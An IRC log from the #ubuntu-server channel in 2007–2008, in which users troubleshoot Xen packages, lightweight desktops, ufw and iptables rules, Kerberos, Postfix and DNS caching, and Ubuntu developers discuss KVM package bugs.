<osmosis> anyone know what the xen package name is on gutsy server ?
<ivoks> osmosis: ubuntu-xen-server?
<osmosis> ivoks: i think thats what it is on 386, but that package doesnt exist on AMD64
<frojnd> mathiaz: I wanna to install it really with low requirements...
<frojnd> mathiaz: I know xubuntu-destkop has more than I need...
<ivoks> osmosis: i don't think xen is builded for amd64
<osmosis> ivoks: its gotta be. its one of the main programs that uses 64.
<mathiaz> frojnd: try xfce4 then
<frojnd> mathiaz: ok
<ivoks> osmosis: apt-cache search xen
<sommer> frojnd: you might also look into fluxbox.
<sommer> it's very lightweight though
<osmosis> ivoks: for 386 gutsy, can you tell me which packages  ubuntu-xen-server installs ?
<frojnd> hm, sommer I don0't have fluxbux package..
<sommer> ya you'll need to apt-get install fluxbox to get it.
<sommer> from the net not cdrom...fyi
<frojnd> sommer: apt-get install fluxbox, package can't be found
<ivoks> Depends: bridge-utils, libc6-xen, libxen3.1, python-xen-3.1, xen-docs-3.1, xen-hypervisor-3.1, xen-ioemu-3.1, xen-tools, xen-utils-3.1, linux-xen
<frojnd> also xfce4 itself... there are missing dependencies..
<sommer> frojnd: have you commented the cdrom line in /etc/apt/sources.list?
<frojnd> sommer: nop, nothing :=
<sommer> frojnd: what version are you running?
<sommer> of Ubuntu
<frojnd> sommer: 606 LTS
<frojnd> ekhm
<frojnd> my monitor is a little squeezed...
<sommer> do  you have universe enabled?
<frojnd> I need to reset it
<frojnd> I can't see what's enabled, disabled
<frojnd> just a sec
<frojnd> sommer: I've uncomment out...
<frojnd> so fluxbox is even leighter than xfce4 ?
<sommer> frojnd: yep, which depending on your needs may work great for you.
<sommer> if you do apt-get update you should be able to install it.
<frojnd> sommer: I have 400mhz 256mb ram..
<frojnd> vesa graphic card...
<sommer> heh...I'd use fluxbox with that hardware over xfce4
<sommer> but xfce4 probably wouldn't do too bad
<sommer> frojnd: here's a site with some more info on fluxbox:
<sommer> https://help.ubuntu.com/community/Fluxbox?highlight=%28fluxbox%29
<sommer> not sure how up to date it is though.
<mralphabet> frojnd: have you disabled the cd as a source in your repos?
<mralphabet> frojnd: nm, i'm 15 minutes behind
<mralphabet> osmosis: packages.ubuntu.com may answer your questions too
<frojnd> sommer: that's funny.. I've installed fluxbox and xdm and restart computer. But than it only says startinx X display manager xdm and nothing... I'm still on server also if I press ctrl + alt +7 nothing happens...
<frojnd> what could be wrond
<frojnd> wrong
<fujin> anyone know how to configure snmp-trapd?
<frojnd> Hm...
<frojnd> Thats interesting... now I've installed GDM
<frojnd> and It says that cannot start x because: /etc/X11/X no such file or directory aborting
<frojnd> How can I configure my xorg...?
<frojnd> anyone?
<frojnd> apperantly I don't have X in my /etc/X11/
<mralphabet> frojnd: I mean this in the nicest way possible, but you are dealing with the channel that uses the command line for almost everything
<frojnd> mralphabet: I know :) I'm trying to get out of this command line :D
<mralphabet> frojnd: we don't usually even have X installed
<frojnd> mralphabet: I see..
<frojnd> mralphabet: still I think that someone tryed here to install X with minimum requirements to work
<mralphabet> frojnd: so what I am trying to say is that we probably aren't the best at troubleshooting X ;(
<mralphabet> frojnd: instead of installing individual packages, it would be better if you installed the virtual package for the window manager you want to use
<mralphabet> frojnd: so xubuntu-desktop I believe
<frojnd> mralphabet: hm I'm trying to install X with as little as possible of crap. :)
<frojnd> mralphabet: that's why I chose fluxbox
<mralphabet> frojnd: and hows that going for you?
<mralphabet> frojnd: slightly tongue in cheek there, but hopefully you see my point
<mralphabet> frojnd: this is on 6.06?
<frojnd> mralphabet: I'm reading some faq on fluxbox home page...
<frojnd> mralphabet: i won't just give up cause gdm can't read X11*
<mralphabet> frojnd: heh, okay
<mralphabet> frojnd: this may help: http://packages.ubuntu.com/dapper/x11/fluxbox
<frojnd> tnanx mralphabet
<frojnd> thanx mralphabet
<fujin> if you install fluxbox, the dependancies should take care of themselves
#ubuntu-server 2007-09-28
<osmosis> how come gutsy has no libc6-xen package ?
<osmosis> is libc6-xen  only for 386 ?
<osmosis> is a special libc still required on amd64 ?
<vsbuffalo> Why does ubuntu server keep telling me to re-insert my install disk when I use apt-get
<mathiaz> vsbuffalo: you need to comment the cdrom source line in /etc/apt/sources.list
<vsbuffalo> mathiaz: thanks, I
<vsbuffalo> 'll do that
<vsbuffalo> wil that force it to grab dependent packages from the web>?
<mathiaz> vsbuffalo: yes
<vsbuffalo> great, thanks mathiaz
#ubuntu-server 2008-09-22
<xiownthisplacex> hi all
<xiownthisplacex> i have installed ubuntu 8.04 on a server, can i fxp on port 22? i've tried it and it doesn't work, do i need to config something? or do i need to install like glftpd?
<vk5foss> xiownthisplacex: can you what on 22?
<xiownthisplacex> i want to fxp from 2 servers that i have
<vk5foss> fxp?
<xiownthisplacex> yea, you know like, flashfxp
<xiownthisplacex> site-to-site transfer
<vk5foss> nope, never heard of it before. (might hae heard of it actually, certainly never used it)
<PanzerMKZ> vk5foss it is ftp between two ftp servers not having the data pass thru the controller machine
<vk5foss> PanzerMKZ: ah
<vk5foss> xiownthisplacex: dare i ask why you want to run it on port 22?
<xiownthisplacex> so i dont have to install a ftp server like proftd or glftpd
<vk5foss> ... is your question "can i copy files between two hosts directly over ssh" ?
<Level15> Hi: WHere can I suggest something to be added to Ubuntu server?
<dendrobates> Level15:  the mailing list, or here during the week.
<lukehasnoname> someone want to do a quick favor?
<Emmett> We changed the server IP of an ubuntu server install. ssh'ed into the machine, no problem. But now it's locking out ssh attempts when it worked fine minutes ago.
<Emmett> Someone just got in, ran an ls and it disconnected them.
<Emmett> Any ideas?
<azteech> reboot it and see if you can get back in?
<Emmett> it's at a data center.
<kgoetz> Emmett: are you using firewalling?
<Emmett> no
<nxvl> Emmett: check if you have ufw blocking stuff
<nxvl> Emmett: it might be the problem
<Emmett> nope.
<nxvl> Emmett: are you sure? it's installed by default
<Emmett> really?
<Emmett> since I only have a minute on it, what are the chances that I could just
<Emmett> sudo ufw disable
<Emmett> and hit enter?
<Emmett> would that kill it all immediately?
<RoAkSoAx> Emmett, it's supposed to
<nxvl> you can do "ssh $host $command"
<Emmett> can I ps -ef | grep ufw to see if it's running anywhere?
<Emmett> like, what daemon does it run?
<nxvl> ufw status
<Emmett> I only have a second, I don't have time for that
 * ajmitch_ wonders if it's as simple as an address collision
<nxvl> ssh $host sudo ufw status
<twb> Is it a bad idea (or even impossible) to include masquerading and other NAT chains and rules in /var/lib/ufw?
<RudyValencia> Hi, I'm trying to setup a Postfix service on my server, for sending out notifications from PHP. How do I configure it in the menus?
<twb> RudyValencia: if it's just going to send mail to a "real" mail server, you want the "satellite" option
<RudyValencia> twb: I'm setting it up to send out things like password reset, confirm account creation, etc. mails.
<RudyValencia> PHP mail(), basically.
<twb> I realize that.
<RudyValencia> It's basically going to send it directly to the other MX for delivery to the user.
<RudyValencia> Would it be a "Satellite system" then?
<twb> RudyValencia: that's what I said.
<RudyValencia> OK
<RudyValencia> I think I may have it
<soren> NCommander: hm?
<ghaleb__> hello, I'm trying to get freeradius source, I get this problem E: Could not open file /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_hardy-security_main_source_Sources - open (2 No such file or directory)
<scuser> hi all, I'm using ubuntu 8.04 and installed kerberos according to this tutorial http://doc.ubuntu.com/ubuntu/serverguide/C/kerberos.html, but when I type kinit I receive no tickets, can anyone help me with that ?
<scuser> hi all, does this message mean that I have a ticket or not http://paste.ubuntu.com/49208/ ?
<twb> krbtgt/SC.BIBALEX.ORG@SC.BIBALEX.ORG is your ticket
<twb> Try #kerberos (#krb?)
<twb> scuser: so you have a TGT, but no other tickets (e.g. an NFS-specific ticket)
<scuser> twb: I'm new to kerberos, so what does this mean ?
<twb> scuser: #kerberos is an IRC channel.
<scuser> twb: ok thanks :)
<Chipzz> scuser: first thing you have to check when you have problems with kerberos is, like btw any document on kerberos will tell you, if you have a working DNS setup, both forward and reverse DNS
<uvirtbot`> New bug: #273043 in apache2 (main) "/etc/init.d/apache2 routinely prints to stderr if few modules are enabled, causing logrotate to spam in cron" [Undecided,New] https://launchpad.net/bugs/273043
<ghaleb_> hello, is there an alternative for freeradius in for EAP wireless authentication ?
<twb> Is there a way to list existing ufw rules in "ufw format", as opposed to the raw iptables-save format?
<kraut> moin
<henkjan> twb: sudo ufw status
<twb> henkjan: oh!  That outputs useful information only if the thing is actually enabled
<twb> henkjan: thanks
<twb> How does it decide whether to be -p tcp, -p udp or both?
<twb> Does it just say "well, for 'ufw add www' there's a www entry for both in /etc/services" ?
<henkjan> hmm, don't know if it gets the names from /etc/services
<henkjan> looks like it does
<scuser> hi all, can anyone tell me how to use .k5login to login without password ?
<henkjan> twb: newer ufw in intrepid add support for application profiles
<henkjan> twb: see http://ubuntuserver.wordpress.com/ and search for ufw package integration
<henkjan> twb: also check http://doc.ubuntu.com/ubuntu/serverguide/C/firewall.html for the updated ufw documentation
<twb> henkjan: I asked because on Hardy I did "ufw add smtp" and "ufw add www"; and I got the following rules:
<twb> tcp 25; tcp 80; udp 80
<henkjan> twb:
<twb> ...I was weirded out that it added UDP only for www.
<henkjan> If the port you want to open or close is defined in /etc/services, you can use the port name instead of the number. In the above examples, replace 22 with ssh.
<twb> henkjan: yeah, I realize that.
<twb> henkjan: I'm trying to understand how it decides which protocol(s) to add if you don't specify any.
<twb> Ooh, a bug.
<twb> http://hpaste.org/10596
<twb> Yeah, it does a different thing if you "add 25" to if you "add smtp".
<twb> The latter only adds TCP, not UDP.
<twb> It also doesn't understand "ufw add 25/icmp", which I just tried for kicks.
<scuser> hi all, can anyone tell me how to use .k5login to login without password ?
<papyromancer> I've gone through the goog and the book, but I'm having trouble getting outside network access to this samba share (local subnet access is great) there's no firewall installed (it think) on this (ubuntu) system, router is setup to DMZ to this server. I can ssh from client to server and vice versa. I try the 'echo "hello" telnet xxx.xxx.xxx.xxx 139' to the server from the client and get "telnet: Unable to connect to remote host: Connection tim
<ropetin> papyromancer: Are you sure your ISP is allowing 139 through?  I know a lot of residential ISPs will block it for security reasons
<ropetin> I wouldn't be surprised if business class ones do too.  I can't see any immediate reason why one would want an Internet available samba share
<papyromancer> ropetin: I am business class... Let me call them up
<papyromancer> hang on ;)
<ropetin> OK :D
<papyromancer> ropetin: comcast blocks those ports system wide at the request of homeland security and cannot unblock them... LOL .... time to build an ssh tunnel from my ec2 instance :D
<Deeps> might i recommend a vpn instead
<ropetin> papyromancer: yeah, as I thought.  I'd go with Deeps suggestion if it really has to be a samba share
<Deeps> or infact, anything not tcp based unless you absolutely have to
<papyromancer> Deeps: I'm going with the tunnel :)
<ropetin> OpenVPN is so easy (relatively) to get running, I'd highly recommend it
<Deeps> papyromancer: up to you, but tunnelling anything over tcp is best avoided unless absolutely necessary
<papyromancer> Deeps: Why do you say so?
<Deeps> due to the nature of how tcp works - it's a "reliable" protocol
<Deeps> if a packet gets lost, it rerequests it
<papyromancer> Deeps: So service will be spotty?
<papyromancer> and slow?
<Deeps> in the mean time, your protocol that your tunnelling might also have error handling too, at which point that also rerequests over the tunnel
<Deeps> so you get a fair bit of duplication and unnecessary slowdown
<papyromancer> Deeps: I'm still gonna go for it, I'm stubborn
<papyromancer> Started a forum thread: http://ubuntuforums.org/showthread.php?p=5833814#post5833814
<papyromancer> I'll let you know how it goes.  And thanks for the advice :)
<Deeps> alrighty
<Deeps> gl, enjoy
<uvirtbot`> New bug: #273099 in net-snmp (main) "No debug symbols package for net-snmp" [Undecided,New] https://launchpad.net/bugs/273099
<NCommander> soren, you are now running pinkie if your fully up to date
<soren> I believe I am.
<soren> -> #xubuntu-devel
<psufan> hey
<psufan> how do I compile newer 2.6.2x kernels on ubuntu 6.06lts if it's even possible, last time I tried it broke the system
<henkjan> psufan: why do you want to compile your own kernel?
<psufan> because 2.6.15 has a nfs crash and burn bug and the nit wit developers don't feel it warrents a patch
<henkjan> psufan: any option to upgrade to the next lts (8.04) ?
<psufan> not unless vmware server 1.x is supported on top
<psufan> or I woul dhave dumped 6.66 already
<slicslak__> how do i add a superuser (on the cli)?  is there a special command?  or just useradd and then add that user to a bunch of groups?
<soren> slicslak__: Just the "admin" grop.
<soren> group, even.
<slicslak__> soren, great thanks
<Chipzz> henkjan: just ignore psufan - iirc, he came insulting the developers on #ubuntu-dev a couple of weeks ago
 * soren greps irclogs
<Chipzz> soren: not 100% sure, but the name rings a bell and his behaviour matches
<Chipzz> also the "6.66" was something I recall from then
<Chipzz> or something along those lines
<soren> Chipzz: Yeah, just found it. *shrug*
<henkjan> Chipzz: ah, okay
<nxvl> morging
<slicslak__> soren, if i want the user to have their own group, do i need to create that group first?   useradd doesn't seem to have that option.
<slicslak__> right now i have:  useradd -G admin -m name
<soren> Use adduser instead.
<soren> I'm not sure about useradd, but I know that adduser creates a group for each user.
<slicslak__> soren, right, thanks
<nxvl> kirkland: ping
<piti> hi. I'm experiencing some trouble with libpam-chroot. I'm experiencing the same kind of problem than https://answers.launchpad.net/ubuntu/+question/33707
<kirkland> nxvl: pong
<piti> must I use the patch proposed ? why there isn't an update on the package ?
<nxvl> kirkland: is it normal that my desktop show a "Private" icon?
<nxvl> kirkland: i mean, i have an icon of a mounted drive called "Private" that calls to my Private crypted forlder
<nxvl> kirkland: as if it were a flash drive or something
<kirkland> nxvl: right, that's because "Private" is mounted
<kirkland> nxvl: from a command line, run "mount"
<nxvl> yup, that i know, but /home is also mounted and doesn't appear in there
<nxvl> kirkland: because to have such an icon will be the first things people ask "why you have that, what you have inthere" and such stuff
<nxvl> kirkland: so it will only raise and interest of other people (maybe system users) on try to break it
<kirkland> nxvl: okay.
<zul> mathiaz: does the patch to #273043 look reasonable to you it does to me
<mathiaz> bug #273043
<uvirtbot`> Launchpad bug 273043 in apache2 "/etc/init.d/apache2 routinely prints to stderr if few modules are enabled, causing logrotate to spam in cron" [Undecided,New] https://launchpad.net/bugs/273043
<mathiaz> zul: seems like a good patch
<zul> thats what I thought but I can see why you want those error messages to cron
<piti> Hi I'm experimenting a trouble with libpam_chroot : I want to chroot someone from ssh, but when I login, I have the welcome message, but imediatly put me out. on the log side, I founded : http://pastebin.com/m7b33ccfb , and possibly a bugreport which may be linked (https://answers.launchpad.net/ubuntu/+question/33707 )
<piti> the same config worked with gutsy, but no longer with hardy. is it a regression ?
<psufan> how do I find out if a kernel update for 6.06lts includes the nfs crash and burn bug and root hole fix
<zul> mathiaz: its for hardy by the looks of it
<mathiaz> psufan: do you have a CVE number ?
<mathiaz> zul: hm - it's probably won't qualify for a SRU.
<psufan> hang on
<psufan> this is what I have
<psufan> https://lists.ubuntu.com/archives/dapper-changes/2008-June/012713.html
<zul> mathiaz: probably not
<psufan> hmm
<psufan> box is still only at -51
<zul> piti: it looks like it to me
<psufan> also
<psufan> what the HELL is with nano in 6.06.2 lts
<psufan> if you hit enter to start a new blank line it suddentely smashes all the lines together
<psufan> this has almost driven me to sucide
<soren> psufan: Nano hasn't been touched in dapper.
<piti> zul: I also found a package on that page : https://bugs.launchpad.net/ubuntu/hardy/+source/libpam-chroot/+bug/237308 . I'm trying it, but shouldn't it be on a repository ? (like -update or -security)
<uvirtbot`> Launchpad bug 237308 in libpam-chroot "libpam-chroot broken" [Undecided,Confirmed]
<soren> It's the exact same as it was when Dapper was first released.
<superdump> hello
<superdump> is it reasonable to ask about caching dns server stuff here?
<zul> piti: its definently a SRU imho
<soren> superdump: Probably :)
<superdump> i'm looking to set up caching dns on a server on my lan and use that for internet dns lookups
<superdump> rather than always using my isp/opendns
<superdump> especially as sometimes they seem intermittent
<piti> zul: what do you mean by SRU ?
<superdump> firstly, what dns server would people recommend for a caching dns server?
<superdump> i saw something about pdnsd but i was expecting that bind would do it
<zul> piti: it should be in -updates
<superdump> i haven't used a dns server before, but once i know what is recommended, i'll have a look around and try to get it working
<Deeps> bind would do the job, and could happily bypass your isp's dns too
<zul> piti: ill have a look
<soren> superdump: If all you're ever going to do is simply dns caching, it doesn't really matter much. I think both bind and dnsmasq come preconfigured to do caching.
<superdump> ok
<superdump> then i just have to figure out how to get bind working :)
<Deeps> apt-get install bind? heh
<soren> Well, bind9, actually :)
<Deeps> out of the box it pretty much does what you need
<Deeps> well, yeah, i always forget that 9
<superdump> yes, i read that it's supposed to
<superdump> what should i have in resolv.conf on the server? just "nameserver 127.0.0.1"?
<superdump> or also some public nameservers?
<kirkland> zul: soren: I posted a pretty trivial debdiff that closes a KVM bug, https://bugs.launchpad.net/ubuntu/+source/kvm/+bug/225260
<uvirtbot`> Launchpad bug 225260 in kvm "control file description miss-leading" [Low,Confirmed]
<kirkland> zul: soren: if one of you could sponsor that, i'd appreciate it
<soren> I don't agree with the change, FWIW.
<soren> The x86 architecture includes both x86 and x86-64.
<psufan> well something is causing nano to spaz
<psufan> dunno if it has to do with being over telnet to a virtual serial port on the blade or not
<kirkland> soren: i understand that x86 includes x86_64, but it seems some users are confused
<soren> kirkland: Also, kvm works on powerpc, s390 and ia64 now as well.
<kirkland> soren: mark the bug as "Invalid" then, with your reason
<kirkland> soren: that's a good point, i was wondering about
<soren> kirkland: Well, we can certainly clarify the description somehow.
<soren> Perhaps change it to "i386 and amd64" or "x86 (both 32 and 64 bit)"
<kirkland> soren: shall i rework the text more generically?
<soren> I think that's probably the best choice.
<soren> I never liked the original description.
<kirkland> soren: should i bother mentioning ppc or s390, since we don't really support those?
<soren> kirkland: I don't think leaving them out and explicitly mentioning i386 and amd64 seems right.  If you could come up with something more generic, that would be cool.
<kirkland> soren: uno momento
<Fenix|work> Greetings and Salutations
<Fenix|work> I have a ufw question and legacy iptable rules
<Fenix|work> I'm going to add some prerouting rules to before.rules
<Fenix|work> I'm looking at the server guide but have a question
<Fenix|work> they show :POSTROUTING ACCEPT [0:0] then have their postrouting rules
<Fenix|work> would I use :PREROUTING ACCEPT [0:0] before placing my prerouting rules?
<jdstrand> Fenix|work: just put :PREROUTING ACCEPT [0:0] and :POSTROUTING ACCEPT [0:0] right next to each other, and first in the *nat table, then you can have the rules in any order after those two
<jdstrand> s/right next to each other/one after the other/
<kirkland> soren: http://pastebin.ubuntu.com/49347/
<kirkland> soren: see if that looks any better to you
<Fenix|work> jdstrand, thanks
<Fenix|work> :)
<jdstrand> np
<soren> kirkland: Hmm... I kind of see your point about not mentioning the ones we don't support. We don't actually currently build the s390, ia64 and powerpc versions right now.
<kirkland> soren: yeah, that's awkward, IMHO
<soren> Yes, "currently right now".
<Fenix|work> jdstrand, you wouldn't happen to know which protocols/ports that squid can actively and safely cache would ya? :)
<kirkland> soren: another option: http://pastebin.ubuntu.com/49349/
<lukehasnoname> kirkland: editing the 8.10 server guide kvm section?
<kirkland> lukehasnoname: no, kvm package description
<jdstrand> Fenix|work: it listens on 3128, by default IIRC it can cache for 80, 443 and ftp, but you'll likely need to check the docs for that (or at least squid.conf)
<soren> kirkland: That works. Only problem is that we have to change it when we add the new architectures. meh, that's probably fine. Let's go with that.
<Fenix|work> jdstrand, yeah, I'm looking at the docs now
<soren> kirkland: How about I give you a day or so to come up with more patches, so that we can batch them together?
<kirkland> soren: Okay.  I think that control file will be the least of our changes if/when we add s390 :-P
<Fenix|work> http/https, ftp, rsync, gopher, wais, http-mgmt, gss-http, filemaker, multiling http, cups, rsync, SWAT
<kirkland> soren: that's perfectly fine
<Fenix|work> jdstrand, where does ufw log to?
<jdstrand> kern.log
<jdstrand> (it's just iptables logging)
<jdstrand> sudo ufw logging on
<Fenix|work> that's already on
<jdstrand> see 'man ufw' for details
<Fenix|work> any way to fine tune what gets logged?
<Fenix|work> my network generages a tonne of broadcast traffic, and it's a waste of log file to see it
<jdstrand> Fenix|work: not via the ufw command, no
<jdstrand> Fenix|work: you can add rules to /etc/ufw/after.rules if that makes sense for your environment
<Fenix|work> jdstrand, would -A ufw-after-input -m pkttype --pkt-type broadcast -j RETURN sufficient?
<Fenix|work> ... perhaps adding multicast in there as well
<jdstrand> Fenix|work: there are example of using BROADCAST and MULTICAST in after.rules and before.rules
<jdstrand> you might check there and 'man iptables' for what will be most appropriate for your environment
<Fenix|work> jdstrand, I didn't see any examples in my after.rules ... so I went IPTables style instead... I noticed the "don't log noisy services by default" used RETURN instead of DROP
<kirkland> soren: I'm closing https://bugs.launchpad.net/ubuntu/+source/kvm/+bug/89399 as "Wont Fix"
<uvirtbot`> Launchpad bug 89399 in kvm "kvm update fails, if group "kvm" already exists and has non-system ID" [Undecided,Won't fix]
<kirkland> soren: i added a note as to why...  let me know if you disagree
<Fenix|work> but adding -A ufw-after-input -m pkttype --pkt-type broadcast -j RETURN eliminated broadcast from my log file
<Fenix|work> so I'll settle with that
<jdstrand> Fenix|work: that is simply to get out of the ufw-not-local chain and back into ufw-before-input for processing
<jdstrand> Fenix|work: that is likely what you want to do, as IIRC, you are using default ACCEPT
<Fenix|work> correct
<jdstrand> so you avoid the 'BLOCK NOT-TO-ME' logging
<Fenix|work> so far working as expected
<Fenix|work> otherwide I'd drop it
<Fenix|work> time to test out my new gateway / proxy server
<Fenix|work> thanks jdstrand
<soren> kirkland: Looks fine. Thanks.
<kirkland> soren: zul was about to sponsor that description debdiff... did you want him to hold off on that?
<soren> kirkland: I'm not really insistant either way.
<kirkland> soren: regarding https://bugs.launchpad.net/ubuntu/+source/kvm/+bug/193531, you were suggesting a README.PXE-boot since we don't have the source to a working PXE bios for an emulated card?
<uvirtbot`> Launchpad bug 193531 in kvm "pxe booting not supported" [Undecided,Confirmed]
<kirkland> soren: I can try to hack up that README and add it too, to close that bug, if you think that's sufficient
<soren> kirkland: Oh, since then, I've added a new package called kvm-pxe which solves the problem.
<kirkland> soren: ah, nice
<kirkland> soren: i'll close that bug pointing to that package
<zul> kirkland: soren gave his blessings on that bug?
<kirkland> zul: he blessed the text, said he'd sponsor a stack of kvm changes in a few days, if i wanted, or you can do them incrementally
<kirkland> zul: personally, i'd rather my changes sponsored incrementally if possible
<kirkland> zul: i'm trying to reduce the kvm queue
<zul> kirkland: okies
<kirkland> soren: looking at https://bugs.launchpad.net/ubuntu/+source/kvm/+bug/188878, do you mind if I add liw's kvm-ok shell script?
<uvirtbot`> Launchpad bug 188878 in kvm "Utility to see if kvm acceleration can be used" [Undecided,New]
<Fenix|work> jdstrand, how do I open up ufw to allow everything
<Fenix|work> I appied ufw default accept and still it blocks
<Fenix|work> err allow
<jdstrand> Fenix|work: yes, you need to follow that with 'sudo ufw disable ; sudo ufw enable'
<Fenix|work> still is blocking
<Fenix|work> do I have to clean up the before and after rules?
<jdstrand> Fenix|work: you shouldn't with the defaults
<jdstrand> of course you'll need to check anything added
<jdstrand> by you
<Fenix|work> I only added *nat prerouting rules
<Fenix|work> I have a single homed box so I didn't add any forwarding/masquerading rules
<zul> kirkland: lemme know which ones you want uploaded
<Fenix|work> (there's a COMMIT right after my prerouting rules... and *nat is before *filter
<jdstrand> Fenix|work: can you paste it somewhere?
<kirkland> zul: the last debdiff in https://bugs.launchpad.net/ubuntu/+source/kvm/+bug/225260
<Fenix|work> most definately
<uvirtbot`> Launchpad bug 225260 in kvm "control file description miss-leading" [Low,In progress]
<Fenix|work> jdstrand, http://rafb.net/p/frMr8C26.html
<zul> kirkland: done
<lhnn> nothing like deleting one's /bin dir, eh?
<kirkland> zul: sweet
<kirkland> zul: i might have a few more coming today
<zul> kirkland: lemme know so I can queue them up
<kirkland> zul: no problemo!
<jdstrand> Fenix|work: the format looks fine (though you probably don't need the POSTROUTING line since you aren't doing that
<Fenix|work> jdstrand, my kern.log has the following for all gateway operations...
<Fenix|work> Sep 22 13:09:11 proxy kernel: [ 1213.921916] [UFW BLOCK INPUT]: IN=eth0 OUT= MAC=00:1f:29:0e:e9:48:00:0c:29:0c:75:ea:08:00 SRC=172.16.0.223 DST=172.16.0.4 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=762 DF PROTO=TCP SPT=49251 DPT=8000 WINDOW=8192 RES=0x00 SYN URGP=0
<jdstrand> Fenix|work: one word of caution. because ufw doesn't manage these rules, it won't actually flush them when doing 'ufw disable' and the like
<jdstrand> Fenix|work: so if you want to start fresh, do 'iptables -F -t nat'
<jdstrand> Fenix|work: and you disabled and enabled?
<Fenix|work> yes
<Fenix|work> and rebooted a couple of times :)
<Fenix|work> I see the ufw-not-local DROPS all
<jdstrand> Fenix|work: can you access port 8000 directly? eg 'telnet proxy 8000'
<psufan> where do I go
<psufan> to browse updates released for a ubuntu version
<jdstrand> Fenix|work: or nmap -Po -p 8000 proxy
<psufan> so I can check changelogs etc
<Fenix|work> jdstrand, the proxy works fine
<Fenix|work> it's when acting as gateway that doesn't
<Fenix|work> so bypassing the proxy
<Fenix|work> although kern.log says that all traffic destined to 8000 is blocked as well
<Fenix|work> UFW BLOCK INPUT
<jdstrand> Fenix|work: can you paste 'iptables -L -n -v' somewhere?
<Fenix|work> http://rafb.net/p/nw41S616.html
<Fenix|work> jdstrand, nmap says 8000 is http-alt
<Fenix|work> and it's open
<jdstrand> Fenix|work: and iptables -L -n -v -t nat
<Fenix|work> http://rafb.net/p/pCjaOf41.html
<jdstrand> Fenix|work: I feel silly. what you are seeing is from an unfinished item on the TODO list: "Default allow logging messages aren't correct in after*.rules"
<jdstrand> Fenix|work: is it actually blocking or just saying it is blocking, but everything works fine?
<Fenix|work> going to gmail.com fails
<kirkland> zul: I just attached a debdiff to solve https://bugs.launchpad.net/ubuntu/+source/kvm/+bug/188878 ... i'd be interested to know if soren is strongly against it
<uvirtbot`> Launchpad bug 188878 in kvm "Utility to see if kvm acceleration can be used" [Wishlist,In progress]
<kirkland> zul: assuming soren isn't -1 on it, i think it's ready to sponsor
<Fenix|work> jdstrand, and windows update isn't working either
<jdstrand> Fenix|work: so does this work:
<jdstrand> http_proxy="http://proxy:8000" elinks -dump http://www.google.com
<jdstrand> (assuming http://proxy:8000 is correct
<zul> kirkland: cool
<zul> lemme go check
<jdstrand> Fenix|work: you can check /var/log/squid/access.log on proxy to see if it is connected there
<Fenix|work> jdstrand, the proxy is working...
<Fenix|work> the box as a gateway isn't working properly
<jdstrand> Fenix|work: ok, then it is a problem with the redirection
<Fenix|work> what redirection?
<zul> kirkland: little overkill me thinks but we'll see what soren says
<Fenix|work> if it isn't squid, it should go straight through
<jdstrand> Fenix|work: you are redirecting ports
<Fenix|work> no, only have one adapter
<kirkland> zul: how so?
 * jdstrand is confused
<Fenix|work> just redirecting 80/443 and 21
<Fenix|work> ok
<Fenix|work> I'm redirecting 80/443 and 21
<Fenix|work> they're fine
<Fenix|work> but when it's a non-squid port (ie, no redirection) its is failing
<Fenix|work> (like windows update for instance)
<zul> kirkland: its just easier to put it in the init script I agree with soren on that one
<Fenix|work> jdstrand, I've tried to set up this box as a transparent proxy
<jdstrand> Fenix|work: what is the network topology for the affected systems?
<Fenix|work> I'm replacing my default gateway with this box
<Kapli> Hello
<Fenix|work> jdstrand, star
<kirkland> zul: okay, if you think so, then close the bug as a "Wont Fix" with your justification.  i thought the binary was small, simple, and correct enough to just drop in place for anyone who might find it useful.
<Fenix|work> 1000-BaseT
<zul> kirkland: i think soren should have the last word though
<Kapli> I have a problem, my server was working fine until today when i rebooted it using the command reboot, when it came back up i couldnt connect to it through the outside and i couldnt connect to it any way and now i try to type ifconfig but nothing shows up
<kirkland> zul: true.
<zul> kirkland: soren will turn green with rage if we did that ;)
<zul> hulk...smash..
<kirkland> zul: did what?  applied that patch?  or closed "Wont Fix"?
<zul> applied the patch
<kirkland> zul: k
<kirkland> zul: well, i kinda noted that soren should probably look at that one first ;-)
<zul> yep I agreee :)
<kirkland> zul: i mean, the patch "solves the bug", but soren should probably decide if the bug is valid or not
<trashguy> Kapli, did u try enabling the device?
<zul> kirkland: of course
<Kapli> enabling what device?
<jdstrand> Fenix|work: so the ufw firewall that I have been looking at is on a different machine than the squid proxy?
<trashguy> Kapli, liek ifconfig eth0 up
<trashguy> or whatever its labeled as
<Kapli> i dont really understand whats going on now because i type ifconfig and nothign shows up usually it would show up loads of info
<trashguy> no loopback?
<Kapli> no it doesnt say the ip and the mac address and stuff
<Kapli> it just goes back to the stuff
<Kapli> it doesnt even say wrong command
<Kapli> be right back
<Fenix|work> jdstrand, same machine
<Fenix|work> without ufw running and iptables set manually, everything works
<Fenix|work> (after clearing iptables)
<jdstrand> Fenix|work: can you give me all the commands you used for getting it to work outside of iptables?
<Fenix|work> sure
<jdstrand> Fenix|work: (just paste them)
<Fenix|work> ok
<Kapli> trashguy, ifconfig eth0 up
<Kapli> didnt work either
<Kapli> the command just doesnt give any result, doesnt even say wrong command or anything
<Ali_ix> Kapli: try: sudo ifconfig -a
<trashguy> heh, me runs as root forgets that stuff rawr
<Kapli> is there any other command
<Kapli> to check internal ip
<trashguy> what does sudo /etc/init.d/networking restart
<trashguy> say
<Kapli> sec, u see im on the phone with my dad hes the one typing the commands since im not at the server location hehe
<trashguy> brutal
<trashguy> IP kvm is handy now and then ^^
<Fenix|work> jdstrand, http://rafb.net/p/7j9FVs51.html
<Kapli> what is IP kvm
<trashguy> Keyboard video mouse i think
<trashguy> KVM switch
<trashguy> but works over ip
<trashguy> essentially works like you are at the local machine
<Kapli> huh
<Kapli> :S
<Kapli> dont understand
<Kapli> anyways he typed ifconfig -a
<Kapli> nothing happened
<Kapli> and he also typed /etc/init.d/networking restart
<trashguy> what kind of server hardware?
<frith> hi, I've been setting up the ldap replication,  however i have found a weird bug, if i delete or create an object the local cn=admin user get deleted
<Kapli> it worked then went back to normal and he typed ifconfig again afterwards still no response
<Kapli> well this is just so confusing ive never had this problem before
<trashguy> shit happens when you party naked
<trashguy> murphys law
<Kapli> i was at school connected through ssh changed some ssh settings and wrote reboot, it came back up but net doesnt seem to be working ...
<trashguy> could be coincidence with some sort of hardware failure
<Kapli> god damnit now is the worst time
<Kapli> but there isnt any other command than ifconfig to check ip
<jdstrand> Fenix|work: I'll look at it and see what the problem is
<trashguy> Kapli, have him do a lspci
